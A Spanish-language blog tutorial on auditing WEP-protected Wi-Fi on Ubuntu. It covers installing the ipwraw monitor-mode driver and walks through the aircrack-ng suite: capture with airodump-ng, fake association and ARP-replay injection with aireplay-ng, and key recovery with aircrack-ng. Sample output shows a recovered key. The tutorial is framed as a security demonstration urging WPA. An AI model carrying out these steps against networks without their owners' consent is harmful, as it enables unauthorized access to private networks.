Auditoria de seguridad wireless con ipw3945 ubuntu y aircrack
En vista al interes de muchos de mis amigos, en cuanto este tema, vamos a dar una pequeña reseña sobre la inseguridad del cifrado WEP, en las redes wireless.
Cabe mencionar que no nos hacemos responsables del mal uso que se le pueda dar a esta informacion y que lo unico que pretendemos es poner en evidencia la inseguridad que representa usar el cifrado WEP en las redes wireless, y que las pruebas que podamos efectuar, siempre sea dentro de redes en las cuales tengamos total concentimiento de sus administradores o propietarios, aclarado este punto continuemos con lo que nos interesa.
Esta informacion esta comprobada para las versiones 7.4 y 7.10, cuando instalamos ubuntu en nuestro equipo, por defecto instala la tarjeta de red con el modulo IPW394 (Intel ProWireless 3945 ABG), para poder hacer la auditoria, es necesario poder poner la tarjeta en modo monitor, lo cual no es posible con este modulo, por lo que es necario instalar los modulos IPWRAW
Antes de instalar el ipwraw debemos instalar algunas dependencias, esto lo hacemos de la siguiente forma
$ sudo apt-get install - build-essential $ sudo apt-get install - linux-ubuntu-modules-$(uname -r) linux-restricted-modules-$(uname -r) linux-image-debug-$(uname -r) linux-image-$(uname -r) linux-headers-$(uname -r)
Aqui (uname -r), nos sirve para devolver la version del kernel que tenemos instalado, asi no tendremos problemas para instalar los paquetes que requerimos.
Si no hemos tenido ningun error hasta aqui, continuamos con la instalacion de ipwraw
descargamos las fuentes
wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
Descomprimimos el paquete,
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
Para instalar, nos cambiamos a la carpeta que se acaba de generar, y tecleamos.
sudo make sudo make install sudo make install_ucode
Con esto ya esta instalado el modulo, pero ahora lo agregaremos a la black list, esto para que no lo carge por defecto si no, solo cuando lo necesitemos.
echo “blacklist ipwraw” | sudo tee /etc/modprobe.d/ipwraw sudo depmod -ae
Ya tenemos todo listo, para poder usar el ipwraw ahora solo hay desmontar el driver ipw3945 y cargar el ipwraw
sudo modprobe -r ipw3945 sudo modprobe ipwraw
Para cargar el ipw3945, hacemos lo mismo, pero al contrario.
sudo modprobe -r ipwraw sudo modprobe ipw3945
Despues de montar y desmontar los driver’s hay que esperar un poco para que se efectuen los cambios.
Para comprobar, que esten funcionando, tecleamos lo siguiente.
iwconfig
Y devemos obtener algo como esto.
lo no wireless extensions. eth0 no wireless extensions. vmnet1 no wireless extensions. vmnet8 no wireless extensions. eth1 unassociated ESSID:off/any Mode:Monitor Channel=1 Bit Rate=54 Mb/s rtap0 no wireless extensions.
Tal vez puedas obtener wifi0 en lugar de eth1
Para efectuar la auditoria necesitaremos la suite aircrack si no la tenemos instalada lo hacemos con esto.
sudo apt-get install aircrack-ng
Listo, ahora empezaremos por averiguar cuales son los acces points accesibles
airodump-ng rtap0
Y deberiamos obtener algo parecido a esto.
CH 0 ][ Elapsed: 8 s ][ 2008-03-05 21:01 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID XX:XX:XX:XX:XX:XX 0 86 9 0 1 54. WEP WEP MAGI BSSID STATION PWR Lost Packets Probes
Al identificar nustro objetivo debemos ejecutar el siguiente script para poder inyectar trafico.
Veremos algo asi
“Indica el canal para eth1 o wifi0? 1 “Indica el rate de captura por defecto debe ser 2” 2 “Indica el bssid objetivo” XX:XX:XX:XX:XX:XX “Configuracion completada, listo par inyectar”
Empezamos a capturar los paquetes con el airodump-bg
airodump-ng -c CANAL -w FICHERO rtap0
Y deberiamos obteneralgo asi
CH 1 ][ BAT: 1 hour 38 mins ][ Elapsed: 48 s ][ 2008-03-05 21:34 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID XX:XX:XX:XX:XX:XX 0 100 467 47 0 1 54. WEP WEP MAGI BSSID STATION PWR Lost Packets Probes
Para poder inyectar necesitamos asociarnos con el acces point.
aireplay-ng -1 0 -e ESSID -a MAC_PUNTODEACCESO -h NUESTRAMAC eth1
21:52:30 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) 21:52:30 Sending Authentication Request 21:52:30 Authentication successful 21:52:30 Sending Association Request 21:52:32 Association successful :-)
Ya que estamos asociados, podemos inyectar para poder generar DATA que son los paquetes que nos interesan
aireplay-ng -3 -b MAC_PUNTODEACCESO -h -h NUESTRAMAC eth1
En unos cuantos segundos podemos ver como genero unos miles de DATA
Saving ARP requests in replay_arp-0305-215511.cap You should also start airodump-ng to capture replies. Read 16339 packets (got 8045 ARP requests), sent 8042 packets...(333 pps)
Esperamos alrededor de 10 min para obtener una buena cantidad de DATA, el tiempo puede variar segun la distancia a la que te encuentres del acces point, no hay una cantidad exacta pero entre 200 300 mil DATA son suficientes segun lo comprobado.
Ahora solo hay que pasar el fichero por el aircrack
aircrack-ng FICHERO.cap
Y listo
Aircrack-ng 0.9 [00:00:01] Tested 1 keys (got 552366 IVs) KB depth byte(vote) 0 0/ 1 39( 100) 11( 33) D6( 15) 6C( 13) 6D( 12) 0D( 11) 17( 9) 95( 8) 5D( 5) 76( 5) 93( 5) D0( 5) 00( 4) 0C( 4) 3A( 3) 1 0/ 1 93( 100) 03( 37) 06( 31) 83( 19) 19( 13) 39( 12) B3( 12) D4( 12) 02( 11) CC( 8) FD( 7) 6C( 5) 86( 5) D2( 5) 30( 4) 2 0/ 1 19( 121) 1B( 15) CE( 12) EB( 12) 2C( 9) 41( 8) 82( 8) CD( 6) 00( 5) 15( 5) 1A( 5) 2B( 5) 34( 5) 39( 5) A2( 5) 3 0/ 1 94( 88) 18( 20) 78( 18) D8( 17) 19( 16) D0( 16) 0D( 10) 83( 9) 69( 8) 75( 6) 82( 6) A0( 6) 41( 5) 46( 5) A2( 5) KEY FOUND! [ 39:93:19:94:35 ] Decrypted correctly: 100%
Todo esto se puede hacer de forma mas simple, con el airoway.sh solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1
LISTEN="rtap0" INJECT="eth1"
Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.
Espero le haya sido de utilidad.
Referencias:
http://aircrack-ng.org/doku.php?id=ipw3945
http://seguridadwireless.net
